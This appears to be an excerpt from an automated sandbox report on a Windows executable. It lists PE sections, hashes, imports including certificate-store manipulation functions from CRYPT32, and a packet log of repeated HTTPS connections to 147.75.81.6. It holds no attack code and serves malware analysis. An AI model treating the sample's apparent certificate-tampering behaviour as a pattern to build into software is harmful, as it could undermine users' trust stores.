IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11c00 | 0x2dd0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xe04 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9e48 | 0xa000 | 5ddb7b5f8f3e7cf367aa8d42f73ccac6 | False | 0.6005615234375 | data | 6.567092617128995 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d68 | 0x5e00 | 611d5d2918b543ab45e808916f086ea2 | False | 0.418218085106383 | Applesoft BASIC program data, first line number 1 | 4.846977766446331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | ebd4e3ddf3b21f8420973cad57b75504 | False | 0.166015625 | data | 2.0362547390297028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xe04 | 0x1000 | f753d4f09f6421d0dae41cab2d5532cf | False | 0.69189453125 | data | 6.157957291444729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.257842064 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.257891893 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.257905006 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.257961988 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408436060 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408523083 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408540010 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408571005 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408587933 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.408615112 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453457117 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453552008 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453574896 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453599930 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453614950 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.453639984 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480381966 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480432987 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480458021 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480465889 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480506897 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.480531931 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519593000 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519635916 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519656897 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519666910 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519680023 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519776106 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519782066 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519812107 CET44349722147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.519946098 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.520247936 CET49722443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.535371065 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.535413980 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.535492897 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.535831928 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:43.535861015 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:44.895095110 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:44.896959066 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:44.897032976 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.596725941 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.596791983 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.596853971 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.596887112 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.596966982 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.597009897 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.597055912 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652554989 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652606964 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652673006 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652673960 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652709007 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.652884007 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795701027 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795751095 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795795918 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795819044 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795854092 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.795876026 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816526890 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816584110 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816617966 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816648960 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816662073 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816787958 CET44349727147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.816844940 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.817619085 CET49727443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.846775055 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.846829891 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.846993923 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.847398996 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:45.847414017 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.208832026 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.215848923 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.215903997 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.715553999 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.715742111 CET44349728147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.715900898 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.776403904 CET49728443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.853621006 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.853658915 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.853796005 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.854202986 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:47.854218960 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.213839054 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.215425968 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.215444088 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.730096102 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.730299950 CET44349735147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.730412960 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.731326103 CET49735443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.744199038 CET49742443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.744271994 CET44349742147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:49.744452953 CET49742443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.503984928 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.504024982 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.504044056 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.504067898 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.504090071 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628612041 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628670931 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628724098 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628724098 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628758907 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.628804922 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.629950047 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.630147934 CET44349756147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.630206108 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.637490988 CET49756443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.944386005 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.944442987 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.944545031 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.944921017 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.944938898 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:58.304080963 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:58.305650949 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:58.305684090 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.013825893 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.013880014 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.013922930 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.013959885 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.013981104 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.014005899 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.014033079 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068170071 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068248034 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068380117 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068392038 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068408012 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.068438053 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212286949 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212372065 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212471962 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212502003 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212527037 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.212539911 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246707916 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246762991 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246826887 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246841908 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246870041 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.246891022 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.276854038 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.276911020 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.276978016 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.276988029 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.277021885 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.277039051 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.326987028 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.327022076 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.327127934 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.327137947 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.327183008 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410214901 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410249949 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410300016 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410326004 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410351992 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.410370111 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.428869963 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.428895950 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.428946972 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.428953886 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.429004908 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447201014 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447246075 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447273970 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447302103 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447339058 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.447350979 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462759018 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462790012 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462827921 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462855101 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462874889 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.462902069 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474643946 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474682093 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474746943 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474765062 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474785089 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.474807978 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590481043 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590513945 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590547085 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590580940 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590590954 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:59.590630054 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.015753031 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.015774965 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.023549080 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.023569107 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.023638010 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.023643970 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.023708105 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.030735016 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.030754089 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.030803919 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.030812025 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.030855894 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.168200016 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.168235064 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.168313980 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.168384075 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.168426991 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.176275015 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.176300049 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.176388025 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.176428080 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.176471949 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.184334040 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.184362888 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.184416056 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.184431076 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.184470892 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.192542076 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.192574978 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.192650080 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.192677021 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.192720890 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.199676037 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.199702024 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.199779034 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.199805021 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.199842930 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208379984 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208409071 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208453894 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208470106 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208488941 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.208509922 CET49763443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.215524912 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.215553045 CET44349763147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:00.215599060 CET49763443192.168.2.5147.75.81.6
